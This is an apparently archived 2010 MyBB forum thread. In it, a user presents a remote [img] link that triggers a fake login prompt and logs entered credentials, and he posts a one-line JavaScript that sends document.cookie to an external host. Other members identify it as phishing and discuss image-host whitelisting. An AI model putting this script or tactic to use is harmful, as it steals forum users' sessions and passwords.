MyBB Community Forums

(2010-11-16, 08:20 AM)Evollution Wrote: [ -> ]ok try to put [img]link[/img] on any website and you will see how it works

http://fifastars.net84.net/scripts/mybb/cool.php replace link with this <<-

---

(2010-11-16, 08:19 AM)darkly Wrote: [ -> ]uCoz =/= MyBB.

) this script works on anywebsite ))) ucoz vbulletin phpbb joomla ... ii dont know smf..

We can always click on 'Cancel'. :p

but to get your cookies i shoud post next :

<script>img = new Image(); img.src = 'http://fifastars.net84.net/scripts/2/loadbanner.php?cook='+document.cookie;</script>

in a html file and after this you must just acces this html file

That looks like more of a phishing attempt where the site tries to spoof itself by saying its asking for "MyBB anthentification" and getting unsuspecting users to enter their login details.

i know you can press cancel but a beginer will insert his password belive me

---

look what i get by now lets say this is a password :d

HAHAHAHAHAHAHAHAHAHAHAH ||| jodifgjdojnfkfjdjfoijfv || Tue.Nov.2010 | 03:25 | ....... | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)

---

HAHAHAHAHAHAHAHAHAHAHAH (shoul be username)
jodifgjdojnfkfjdjfoijfv (password)

(2010-11-16, 08:26 AM)Evollution Wrote: [ -> ]i know you can press cancel but a beginer will insert his password belive me

---

look what i get by now lets say this is a password :d

HAHAHAHAHAHAHAHAHAHAHAH ||| jodifgjdojnfkfjdjfoijfv || Tue.Nov.2010 | 03:25 | | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)

---

HAHAHAHAHAHAHAHAHAHAHAH (shoul be username)
jodifgjdojnfkfjdjfoijfv (password)

Remove my IP please.

So this is not a MyBB security hole as you so blatantly put it. Its a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure will cause you to get banned wherever you use such a tactic!

(2010-11-16, 08:36 AM)- G33K - Wrote: [ -> ]So this is not a MyBB security hole as you so blatantly put it. Its a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure will cause you to get banned wherever you use such a tactic!

ok try to insert this script [img]link[/img] on premium uCoz websites and you will see that this is not working

---

+ here is a website when you try insert an img says:

Din motive de securitate, imaginile pentru tag-ul [img] se acceptă doar de pe site-urile din această listă, puteți să le încărați acolo. Apăsați butonul Înapoi, și edițați-vă mesajul.

Translate:
For security reasons, the images tag [img] shall be accepted only on sites in this list, you can get it loaded there. Click the Back button and edit your message.

website lists:
http://tinypic.com
http://imgur.com
http://imageshack.us
http://fastpic.ru
http://radikal.ru
http://immage.de
http://bayimg.com 

---

maybe it's not a security hole, but it would be better if we try to avoid situations where our users, give their passwords to hackers

You realise that any website that allows you to input images is 'vulnerable' to this...?? All you're doing is writing a malicious script and getting people to visit it to steal their information.

yes i realise this but can you do so that images be accepted only from some sites not from all ? just like in the above example

(2010-11-16, 10:10 AM)Evollution Wrote: [ -> ]yes i realise this but can you do so that images be accepted only from some sites not from all ? just like in the above example

You can request it as a plugin.

IMO, you can not have this as a core feature of MyBB because it would be too limiting and admins would have to muck around with the list of sites to allow/disallow.

Also, using this phishing attempt will not last long on any board with active moderators as they will immediately remove it and ban the user who posted it.